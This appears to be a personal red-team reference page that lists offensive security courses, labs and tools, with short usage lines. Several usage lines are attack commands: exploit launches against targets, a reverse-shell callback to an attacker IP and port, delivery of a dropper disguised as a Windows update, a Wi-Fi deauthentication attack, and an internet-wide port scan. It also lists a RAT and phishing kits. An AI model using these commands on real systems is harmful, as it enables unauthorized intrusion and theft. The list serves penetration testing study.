Toolbox

Certification/Courses/Platforms/Knowledge/labs

NameDescriptionLinkTag
CARTPCertified Azure Red Teaming ProfessionalAttacking & Defending Azure Cloud: Beginner’s Edition (CARTP) (alteredsecurity.com)Certification
Root meWelcome [Root Me : Hacking and Information Security learning platform] (root-me.org)Platform
PentesterLabPentesterLab: Learn Web Penetration Testing: The Right WayPlatform
CRTS Red Team Specialist [CRTS] – CWL : Advanced Cyber Attack & Detection Learning Platform (cyberwarfare.live)Certification
VX-Undergroundhttps://www.vx-underground.org/Knowledge collection
Maldev AcademyMaldev AcademyCertification
Zero-Point SecurityRed Team Ops II, Red Team Ops I, C2 Development C#…Zero-Point Security (zeropointsecurity.co.uk)Courses
Fucking the book of secret knowledge Correia-jpv/fucking-the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. With repository stars⭐ and forks🍴 (github.com)Knowledge collection
Red Team LabsOnline Red Team Labs | Altered SecurityCertification
HTB CPTSHTB Penetration Testing Certification [CPTS] | Hack The BoxCertification
Game Of Thrones Active DirectorySelf-hosted vulnerable AD lab. Orange-Cyberdefense/GOAD: game of active directory (github.com)Lab
PentesteracademyAll Courses – Full Listing (pentesteracademy.com)Courses
Breadev AcademyEvilNginx (Phishing course)https://academy.breakdev.org/Course
Rhino Security LabsRhinoSecurityLabs/cloudgoat: CloudGoat is Rhino Security Labs’ “Vulnerable by Design” AWS deployment tool (github.com)Lab
Awesome EDR Bypass List of PoC, blogs, tools etctkmru/awesome-edr-bypass: Awesome EDR Bypass Resources For Ethical Hacking (github.com)Knowledge
Awesome AV-EDR-XDR Bypass How to bypass different AV vendors MrEmpy/Awesome-AV-EDR-XDR-Bypass: Awesome AV/EDR/XDR Bypass Tips (github.com)Knowledge
Binary OffensiveMgeeky. Initial Access Training binary-offensive | Offensive IT SecurityCourses
Sektor7Malware dev, windows evasion etcSEKTOR7 ResearchCourse
Hacktricks Learning and CertsCloud CertsHackTricks TrainingCourse/Certification
BallisKitInitial Access Training and toolBallisKitCourse/knowledge
Attacking and Defending Azure AD Cloud: Beginner’s EditionCloud CertAttacking & Defending Azure Cloud: Beginner’s Edition (CARTP) (alteredsecurity.com)Certification
The Art Of Initial AccessThis course is for learning to create macro in VBA to gain inital accessMacroPioneer: The Art of Initial Access – Advanced Macro Techniques Series (redteamtacticsacademy.com)Course
CyberwarfareCertified Red Team Analyst (CRTA) CyberWarFare Labs – Learn Cyber SecurityCertification
Offensive Development and TradecraftLearn advanced skills of Red Team Operators and Offensive DevelopersOffensive Development and Tradecraft – Ask Academy LiveCertification

Unsorted tools

Name of the ToolLinkDescriptionCommand ExampleTool Category
JAWS – Just Another Windows (Enum) ScriptGitHub LinkJAWS is a Windows enumeration script.N/AEnumeration/Info Gathering
ProxyNotShell-PoCGitHub LinkProxyNotShell-PoC is a proof of concept tool.N/AExploitation
MSSQL Practical Injection Cheat Sheet – Perspective RiskLinkA practical cheat sheet for MSSQL injection.N/AWeb Application
Pycrypt (Pycrypt)GitHub LinkPycrypt is a tool related to cryptography in Python.N/AEncryption/Decryption
Cython: C-Extensions for PythonLinkCython is a tool for creating C-extensions for Python.N/ADevelopment Tools
ZoomEyeLinkZoomEye is a cyberspace mapping tool.N/AEnumeration/Info Gathering
ICMP Reverse Shell written in Python 3 (icmpdoor)GitHub Linkicmpdoor is an ICMP reverse shell written in Python 3.N/APost-Exploitation
ICMP reverse shell in Python 3 (Cryptsus Blog)LinkInformation on using an ICMP reverse shell in Python 3.N/APost-Exploitation
You got Domain Admin, now what?LinkAn article discussing actions to take after gaining Domain Admin access.N/APost-Exploitation
How to bypass sudo — exploit cve-2023–22809 vulnerabilityLinkA guide on bypassing sudo using a CVE-2023-22809 vulnerability.N/APrivilege Escalation
fireprox: AWS API Gateway management toolGitHub Linkfireprox is a tool for creating HTTP pass-through proxies for IP rotation using AWS API Gateway.N/AWeb Application
OfflineSAM/OfflineAddAdmin2GitHub LinkOfflineSAM/OfflineAddAdmin2 is a tool for adding admin accounts offline in Windows.N/APrivilege Escalation
Falcon SandboxLinkFalcon Sandbox is a malware analysis service.N/AMalware Analysis
Inveigh: .NET IPv4/IPv6 machine-in-the-middle toolGitHub LinkInveigh is a tool for intercepting traffic and performing man-in-the-middle attacks on IPv4/IPv6 networks.N/AExploitation
Pentesting CI/CD MethodologyLinkA methodology for penetration testing in CI/CD environments.N/APenetration Testing
Sn1per: Attack Surface Management PlatformGitHub LinkSn1per is an attack surface management platform.N/APenetration Testing
SignatureGate: Weaponized HellsGate/SigFlipGitHub LinkSignatureGate is a tool related to weaponized HellsGate/SigFlip.N/AExploitation
Synergy-httpx: Python HTTP server for red teaming activitiesGitHub LinkSynergy-httpx is a Python HTTP server designed for red teaming activities.N/AWeb Application
RosFuscator: C# source code obfuscation projectGitHub LinkRosFuscator is a project for obfuscating C# source code using Roslyn.N/AExploitation
HavocN/ANo link or description provided.N/AN/A
atomic-red-team: Detection tests based on MITRE’s ATT&CKGitHub Linkatomic-red-team provides detection tests based on MITRE’s ATT&CK framework.N/AEnumeration/Info Gathering
ChainBrain AI: Advanced Prompts for ChatGPTLinkChainBrain AI is a tool for providing advanced prompts to ChatGPT.N/AN/A
Villain: C2 framework for reverse shellsGitHub LinkVillain is a C2 framework for handling multiple TCP socket and HoaxShell-based reverse shells.N/AExploitation
Wormhole: Private file sharingLinkWormhole is a private file sharing tool.N/AN/A
PowershellKerberos: dumper.ps1GitHub LinkPowershellKerberos provides a dumper.ps1 script.N/AEnumeration/Info Gathering
pyFUD: Cross-platform remote access Trojan (RAT)GitHub LinkpyFUD is a cross-platform remote access Trojan (RAT).N/AMalware
Caido: Lightweight web security auditing toolkitN/ANo link provided.N/AN/A
OSINT IndustriesLinkOSINT Industries provides OSINT tools and resources.N/AEnumeration/Info Gathering
IPVoid: IP address and network toolsLinkIPVoid offers IP address and network tools.N/AEnumeration/Info Gathering
LOTS Project: Living Off Trusted SitesN/ANo link or description provided.N/AN/A
Penetration-Testing-Tools: Collection of tools and scriptsGitHub LinkA collection of tools, scripts, and cheatsheets for red teaming, penetration testing, and IT security audits.N/APenetration Testing
XSStrike: Advanced XSS scannerGitHub LinkXSStrike is an advanced XSS scanner.N/AWeb Application
PetitPotam: PoC tool for Windows authenticationGitHub LinkPetitPotam is a proof of concept tool to coerce Windows hosts to authenticate to other machines.N/AExploitation
Snaffler: Tool for finding candyGitHub LinkSnaffler is a tool for pentesters to find valuable information.N/AEnumeration/Info Gathering
LaZagne: Credentials recovery projectGitHub LinkLaZagne is a credentials recovery project.N/APassword Cracking
rdpwrap: RDP Wrapper LibraryGitHub Linkrdpwrap is an RDP Wrapper Library.N/APrivilege Escalation
iKAT: Interactive Kiosk Attack ToolLinkiKAT is an interactive kiosk attack tool.N/AExploitation
RdpThief: Extracting Clear Text Passwords from mstsc.exeGitHub LinkRdpThief extracts clear text passwords from mstsc.exe using API hooking.N/APassword Cracking
Snusbase: Database Search EngineLinkSnusbase is a database search engine.N/AEnumeration/Info Gathering
attacking-cloudgoat2: Walkthrough of CloudGoat 2.0 scenariosGitHub LinkA step-by-step walkthrough of CloudGoat 2.0 scenarios.N/APenetration Testing
ligolo-ng: Tunneling and pivoting toolGitHub Linkligolo-ng is a tunneling and pivoting tool that uses a TUN interface.N/AExploitation
PowerAL: PowerShell module for identifying AppLocker weaknessesGitHub LinkPowerAL is a PowerShell module for identifying AppLocker weaknesses.N/APrivilege Escalation
prettyRECONN/ANo link or description provided.N/AN/A
ExtractBitlockerKeys: Script to extract Bitlocker recovery keysGitHub LinkA script to automatically extract Bitlocker recovery keys from a domain.N/APost-Exploitation
Microsoft-Activation-Scripts: Windows and Office activatorGitHub LinkA Windows and Office activator using HWID / KMS38 / Online KMS activation methods, with a focus on open-source code and fewer antivirus detections.N/AExploitation
NetExec: The Network Execution ToolGitHub LinkNetExec is a network execution tool.N/AExploitation
naabu: Fast port scanner for attack surface discoveryGitHub Linknaabu is a fast port scanner designed for attack surface discovery in bug bounties and pentests.N/AEnumeration/Info Gathering
DavRelayUp: Local privilege escalation toolGitHub LinkDavRelayUp is a tool for local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced.N/APrivilege Escalation
AD_Miner: Active Directory audit toolGitHub LinkAD_Miner is an Active Directory audit tool that leverages Cypher queries to analyze data from the Bloodhound graph database and uncover security weaknesses.N/AEnumeration/Info Gathering
Perfusion: Exploit for RpcEptMapper registry key vulnerabilityGitHub LinkPerfusion is an exploit for the RpcEptMapper registry key permissions vulnerability in Windows.N/AExploitation
MSSqlPwner: Microsoft SQL Server exploitation toolGitHub LinkMSSqlPwner is a tool for exploiting Microsoft SQL Server.N/AExploitation
HeidiSQL: Database management toolLinkHeidiSQL is a database management tool for MariaDB, MySQL, MSSQL, PostgreSQL, and SQLite.N/ADatabase Management
Apollo 11 Guidance Computer (AGC) Source CodeGitHub LinkOriginal source code for the Apollo 11 Guidance Computer (AGC) used in the command and lunar modules.N/ASoftware Development
index-of.co.ukWebsite LinkA website providing links to various files and resources.N/AEnumeration/Info Gathering
Top Pentest DevicesN/ANo link or description provided.N/AN/A
WolframAlpha: Computational IntelligenceLinkWolframAlpha is a computational intelligence engine that provides answers to a wide range of queries.
tomcatWarDeployer: Apache Tomcat auto WAR deployment toolGitHub LinktomcatWarDeployer is a tool for automatically deploying WAR files to Apache Tomcat servers during penetration testing.N/AExploitation
nmapAutomator: Background script for NmapGitHub LinknmapAutomator is a script designed to run Nmap in the background and automate the process of port scanning and service enumeration.N/AEnumeration/Info Gathering
kerbrute: Kerberos bruteforcing scriptGitHub Linkkerbrute is a script for performing Kerberos bruteforcing using Impacket library.N/APassword Cracking
kerbrute: Tool for Kerberos pre-auth bruteforcingGitHub Linkkerbrute is a tool for performing Kerberos pre-authentication bruteforcing.N/APassword Cracking
attacktive-directory-tools: Tools for Active DirectoryGitHub Linkattacktive-directory-tools is a collection of tools for Active Directory attacks and enumeration.N/AEnumeration/Info Gathering
pywerview: Python rewriting of PowerViewGitHub Linkpywerview is a Python rewrite of PowerSploit’s PowerView, a tool for Active Directory enumeration.N/AEnumeration/Info Gathering
evil-winrm: WinRM shell for hacking/pentestingGitHub Linkevil-winrm is a tool for interacting with Windows Remote Management (WinRM) for hacking and penetration testing.N/AExploitation
sqlmap: SQL injection and database takeover toolGitHub Linksqlmap is an automated SQL injection and database takeover tool.N/AWeb Application
crunch: Wordlist generatorGitHub Linkcrunch is a wordlist generator that allows you to specify a standard character set for generating password lists.N/APassword Cracking
wfuzz: Web application fuzzerGitHub Linkwfuzz is a web application fuzzer that helps in discovering vulnerabilities through automated testing.N/AWeb Application
OWASP CheatSheetSeries: Application security cheat sheetsGitHub LinkThe OWASP Cheat Sheet Series provides a collection of high-value information on specific application security topics.N/ASecurity Reference
ncsc-scanning-made-easy-script-developer-guidelines.mdGitHub LinkDeveloper guidelines for creating scanning scripts as part of the UK NCSC Scanning Made Easy project.N/ASecurity Guidelines
pspy: Linux process monitoring without root permissionsGitHub Linkpspy is a tool for monitoring Linux processes without requiring root permissions.N/AEnumeration/Info Gathering
Churrasco: Changes for Visual Studio 2013GitHub LinkChurrasco contains changes for Visual Studio 2013.N/ADevelopment Tools
MS10-059: Chimichurri Windows kernel exploitGitHub LinkMS10-059 is a Windows kernel exploit known as Chimichurri.N/AExploitation
CVE-2021-4034: 1-day vulnerabilityGitHub LinkCVE-2021-4034 is a one-day vulnerability.N/AExploitation
unicorn: PowerShell downgrade attack and shellcode injectorGitHub Linkunicorn is a tool for using a PowerShell downgrade attack and injecting shellcode into memory.N/AExploitation
dostackbufferoverflowgoodGitHub Linkdostackbufferoverflowgood is a resource for learning about stack buffer overflows.N/AExploitation
Obfuscated String/Shellcode Generator – Online ToolWebsite LinkAn online tool for generating obfuscated strings and shellcode.N/AExploitation
explodingcan: Implementation of NSA’s ExplodingCan exploitGitHub Linkexplodingcan is an implementation of NSA’s ExplodingCan exploit in Python.N/AExploitation
winPEAS: Privilege Escalation for WindowsGitHub LinkwinPEAS is a

Information Gathering/ Enumeration

Tool/TechniqueLinkDescriptionCommand/Example
NMAP – Network Mapper NSEDoc Reference Portal

Nmap Cheat Sheet

Usage and Examples | Nmap Network Scanning

Firewall/IDS Evasion and Spoofing | Nmap Network Scanning
Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses.nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output
Bateahttps://github.com/delvelabs/bateaThe goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports. # Complete info
$ sudo nmap -A 192.168.0.0/16 -oX output.xml

# Partial info
$ sudo nmap -O -sV 192.168.0.0/16 -oX output.xml

$ batea -v output.xml
Binwalkhttps://github.com/ReFirmLabs/binwalkBinwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.# Extract any file that it finds
binwalk -e firmware.bin
Blackeyehttps://github.com/An0nUD4Y/blackeye

https://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/
Create phishing webistes to phish information. https://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/
Censyshttps://censys.io/Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet facing riskshttps://search.censys.io/
Shodanhttps://www.shodan.io/Search Engine for the Internet of Everythingapache country:no port:80 http.status:200
Dighttps://www.hostinger.com/tutorials/how-to-use-the-dig-command-in-linux/Dig (Domain Information Groper) is a command line utility that performs DNS lookup by querying name servers and displaying the result to you.dig [server] [name] [type]
DNSdumpsterhttps://dnsdumpster.com/DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Search for domain.
Enum4Linuxhttps://github.com/CiscoCXSecurity/enum4linuxEnum4linux is a tool for enumerating information from Windows and Samba systemsenum4linux -a host
EyeWitnesshttps://github.com/FortyNorthSecurity/EyeWitnessEyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known../EyeWitness -f urls.txt --web
Insomnia https://insomnia.rest/Run API queries with GUISee website
Masscanhttps://github.com/robertdavidgraham/masscanThis is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.Scans the entire intenret
masscan 0.0.0.0/0 -p0-65535
Maltegohttps://www.maltego.com/product-features/?utm_source=paterva.com&utm_medium=referral&utm_campaign=301Maltego1 is a very powerful data mining tool that offers an endless combination of search tools and strategies
SIPvicious suitehttps://github.com/EnableSecurity/sipviciousSIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.See github for full documentation
Steghidehttp://steghide.sourceforge.net/Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files.$ steghide embed -cf picture.jpg -ef secret.txt
Enter passphrase:
Re-Enter passphrase:
embedding "secret.txt" in "picture.jpg"... done
ODAT – Oracle Database Attacking Toolhttps://github.com/quentinhardy/odatODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.See github.
theHarvesterhttps://github.com/laramies/theHarvesterThe tool gathers names, emails, IPs, subdomains, and URLstheharvester -d megacorpone.com -b googlex
Social searcherhttps://www.social-searcher.com/Free Social Media Search Enginen/a
Sn1perhttps://github.com/1N3/Sn1perDiscover hidden assets and vulnerabilities in your environmentSee github
gitleaksGitHub – gitleaks/gitleaks: Protect and discover secrets using Gitleaks 🔑Gitleaks is a SAST tool for detecting and preventing hardcoded secrets like passwords, api keys, and tokens in git repos. gitleaks detect --source . -v
AutoReconGitHub – Tib3rius/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.Automatic enumerationautorecon -t target

Exploitation

ToolLinkDescriptionCommand/Example
MS17-010https://github.com/helviojunior/MS17-010

https://github.com/worawit/MS17-010
Repository for EternalBlue exploit.See repository.
MS10-059https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri
Infectious Monkeyhttps://www.guardicore.com/infectionmonkey/Infection Monkey is a free open-source, network penetration testing tool. It is a breach and attack simulator that uses real-world attack techniques and known vulnerabilities.https://woodward.digital/infection-monkey-network-penetration-testing/?v=c2f3f489a005
Metsploithttps://www.offensive-security.com/metasploit-unleashed/exploits/Exploit vulnerabilites automatically. msfconsole
Windows-php-reverse-shellhttps://github.com/Dhayalanb/windows-php-reverse-shellSimple php reverse shell implemented using binary , based on an webshell .Usage : change the ip and port in the windows-php-reverse-shell.php file upload , set up an listener in you machine , access the windows-php-reverse-shell.php file on the server
SQLmaphttps://github.com/sqlmapproject/sqlmapsqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. To get a list of basic options and switches use:
python sqlmap.py -h
IIS 6.0 BOF – RCEhttps://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269CVE-2017-7269 – Buffer Overflow in the ScStoragePathFromUrl  function in webdavpython2 exploit.py targetip targetport srcip srcport
Drupalgeddon2https://github.com/dreadlocked/Drupalgeddon2Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002ruby drupalgeddon2.rb TARGET
Windows Kernel Exploit Listhttps://github.com/SecWiki/windows-kernel-exploitsList of Kernel exploitsSee github

Password Crackers

ToolLinkDescriptionCommand/Example
Hashcathttps://hashcat.net/hashcat/Hashcat is a password cracking tool. See CheatSheet
Hydrahttps://github.com/vanhauser-thc/thc-hydraThis tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.See CheatSheet

Privilege Escalation

ToolLinkOS DescriptionCommand/Example
BeRoot Projecthttps://github.com/AlessandroZ/BeRootWindows/Linux BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.usage: beRoot.exe [-h] [-l]

python beroot.py
Deepcehttps://github.com/stealthcopter/deepceN/ADocker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)# Make the script executable and then run it
chmod +x ./deepce.sh

./deepce.sh
GTFObinshttps://gtfobins.github.io/UNIXGTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.See website.
LinEnumhttps://github.com/rebootuser/LinEnumLinuxList possible PrivEsc VectorsSee github
linPEAShttps://github.com/carlospolop/PEASS-ng/tree/master/linPEASLinuxList possbile privesc vectors./linpeas.sh
winPEAShttps://github.com/carlospolop/PEASS-ng/tree/master/winPEASWindowsList possible privesc vectors winpeas.exe or winpeas.bat
linuxprivcheckerhttps://github.com/linted/linuxprivcheckerLinuxList possible privesc vectors https://github.com/linted/linuxprivchecker/blob/master/linuxprivchecker.py
linux-exploit-suggesterhttps://github.com/mzet-/linux-exploit-suggesterLinuxList possible privesc vectors. Run locally./linux-exploit-suggester.sh
windows-exploit-suggesterhttps://github.com/AonCyberLabs/Windows-Exploit-SuggesterWindows List posbile privesc vectors. Run locally./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
PowerSploit\PowerUp.ps1https://github.com/PowerShellMafia/PowerSploit/tree/master/PrivescWindowsPowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.See full potentional i github. To execute on target, see my cheatsheet.
PowerSploit\PowerView.ps1https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993WindowsPowerView is series of functions that performs network and Windows domain enumeration and exploitation.See full potentional i github. To execute on target, see my cheatsheet.
Juicy Potatohttps://github.com/ohpe/juicy-potatoRottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges.
MS10-059 Chimichurrihttps://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20ChimichurriWindowsVulnerabilities in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799)chimichurri.exe attackerip attackerport
Polkit CVE-2021-4034https://github.com/joeammond/CVE-2021-4034Linuxpolkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution:python3 cve-2021-4034.py (run it on target to get root.

Post-Exploitation

ToolLinkDescriptionCommand/Example
C2 – Covenanthttps://github.com/cobbr/CovenantCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.https://github.com/cobbr/Covenant/wiki/Installation-And-Startup
C2 – PoshC2https://github.com/nettitude/PoshC2PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.See github
C2 – Cobalt Strikehttps://www.cobaltstrike.com/Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network.https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_main.htm?cshid=1085
C2 – Empire https://github.com/EmpireProject/EmpireEmpire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agenthttp://www.powershellempire.com/?page_id=83
C2 – Starkiller (Empire frontend)https://github.com/BC-SECURITY/StarkillerStarkiller is a Frontend for Powershell Empire./starkiller-<version>.AppImage --no-sandbox
C2 – Meterpreterhttps://github.com/r00t-3xp10it/meterpeterThis PS1 starts a listener Server on a Windows|Linux attacker machine and generates oneliner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machineDeliver Dropper/Payload To Target Machine (apache2)
USE THE 'Attack Vector URL' TO DELIVER 'Update-KB4524147.zip' (dropper) TO TARGET .. UNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator)..
C2 – Alan Frameworkhttps://github.com/enkomio/AlanFrameworkAlan Framework is a post-exploitation framework useful during red-team activities.https://www.youtube.com/watch?v=dgEBEAfEseY
C2 – Silver https://github.com/BishopFox/sliverSliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing.Linux One Liner
curl https://sliver.sh/install|sudo bash 
and then run 
sliver

Armitagehttps://www.offensive-security.com/metasploit-unleashed/armitage/ Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. https://www.offensive-security.com/metasploit-unleashed/armitage-exploitation/
Chiselhttps://github.com/jpillora/chiselChisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.$ chisel server --port $PORT --proxy http://example.com
# listens on $PORT, proxy web requests to http://example.com
sshuttlehttps://github.com/sshuttle/sshuttle#sshuttle-where-transparent-proxy-meets-vpn-meets-sshsshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via sshsshuttle [options] -r [username@]sshserver[:port] <subnets …>
lingolo-nghttps://github.com/tnpitsecurity/ligolo-ngLigolo-ng is a simplelightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).See github
C2 – HavocHavoc (havocframework.com)

GitHub – HavocFramework/Havoc: The Havoc Framework.
Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

New C2 framework that can bypass Win 11 defender
See github
C2 – Brute ratel Brute Ratel C4 | Badger doesn’t care. It takes what it wants!A Customized Command and Control Center for Red Team and Adversary Simulation

Web Application

ToolLinkDescriptionCommand/Example
BurpSuitehttps://portswigger.net/burpBurp Suite is a framework of web appliccation pentesting tool. It is used to perform web app testing.  https://blog.aghanim.net/?p=732
Dirbhttps://github.com/v0re/dirb

https://www.kali.org/tools/dirb/
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects.dirb <url_base> <url_base> [<wordlist_file(s)>] [options]
Dirbpyhttps://github.com/marcolivierbouch/dirbpyThis is a new version of dirb but in python. This version is faster than the normal version in C because it uses thread. Dirbpy is a Web Content Scanner. It looks for hidden Web Objects.dirbpy -o https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt -u https://[....].com
Dirhunterhttps://github.com/Nekmo/dirhuntDirhunt is a web crawler optimize for search and analyze directories.$ dirhunt http://website.com/
ffufhttps://github.com/ffuf/ffufA fast web fuzzer written in Go.ffuf -w /path/to/wordlist -u https://target/FUZZ
Feroxbusterhttps://github.com/epi052/feroxbusterferoxbuster is a tool designed to perform Forced Browsing../feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
Gobusterhttps://github.com/OJ/gobusterGobuster is a tool used to brute-force:
URIs (directories and files) in web sites.
DNS subdomains (with wildcard support).
Virtual Host names on target web servers.
Open Amazon S3 buckets
gobuster dir -u http:// -w wordlist
Fuxploiderhttps://github.com/almandin/fuxploiderThis tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
FuzzDBhttps://github.com/fuzzdb-project/fuzzdbIncrease the likelihood of finding application security vulnerabilities through dynamic application security testing.https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints
Niktohttps://github.com/sullo/niktoNikto is web server scannernikto -h <target>
Raccoonhttps://github.com/evyatarmeged/RaccoonOffensive Security Tool for Reconnaissance and Information GatheringUsage: raccoon [OPTIONS] TARGET
Sublist3rhttps://github.com/aboul3la/Sublist3rSublist3r is a python tool designed to enumerate subdomains of websites using OSINT.To enumerate subdomains of specific domain:
python sublist3r.py -d example.com
Joomscanhttps://github.com/OWASP/joomscanAutomating the task of vulnerability detection and reliability assurance in Joomla CMS deploymentsjoomscan.pl [options]
Droopscanhttps://github.com/SamJoan/droopescanSupported CMS are:
SilverStripe
WordPress
Drupal
droopescan scan drupal -u http://example.org/ -t 32
Crawleethttps://github.com/truerandom/crawleetWeb Recon & Exploitaition Tool.python crawleet.py -u <URL>
wafw00fhttps://github.com/EnableSecurity/wafw00fWAF Bypass wafw00f http://target

Active Directory Environment

ToolLinkDescriptionCommand/Example
BloodHoundADhttps://github.com/BloodHoundAD/BloodHoundBloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.https://bloodhound.readthedocs.io/en/latest/index.html
Impackethttps://github.com/SecureAuthCorp/impacketImpacket is a collection of Python classes for working with network protocols. NOT LIMITED TO AD ENVIRONMENT.https://www.secureauth.com/labs/open-source-tools/impacket/
Nishanghttps://github.com/samratashok/nishangNishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENTSee github
PowerSploithttps://github.com/PowerShellMafia/PowerSploitPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENTSee github

Malware Analysis(MA)/ Buffer Overflow(BOF)

TypeToolLinkDescriptionCommand/Example
MAGhidrahttps://ghidra-sre.org/A software reverse engineering (SRE) suite of tools developed by NSA’s Research Directorate in support of the Cybersecurity missionhttps://github.com/NationalSecurityAgency/ghidra
BOFPython GDB PEDAhttps://github.com/longld/pedaPEDA – Python Exploit Development Assistance for GDBSee Github

WiFi / Wireless

ToolLinkDescriptionCommand/Example
Aircrack-ng https://www.aircrack-ng.org/Aircrack-ng is a complete suite of tools to assess WiFi network security.

Monitoring: Packet capture and export of data to text files for further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)
#Deatuh attack
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

# Start airodump-ng to collect authentication handshake
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
BoopSuitehttps://github.com/MisterBianco/BoopSuite

https://en.kali.tools/?p=462
BoopSuite is a set of tools written in Python designed for wireless auditing and security testing.BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {}
               [-m MAC]
Kismethttps://www.kismetwireless.net/Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework.https://github.com/kismetwireless/kismet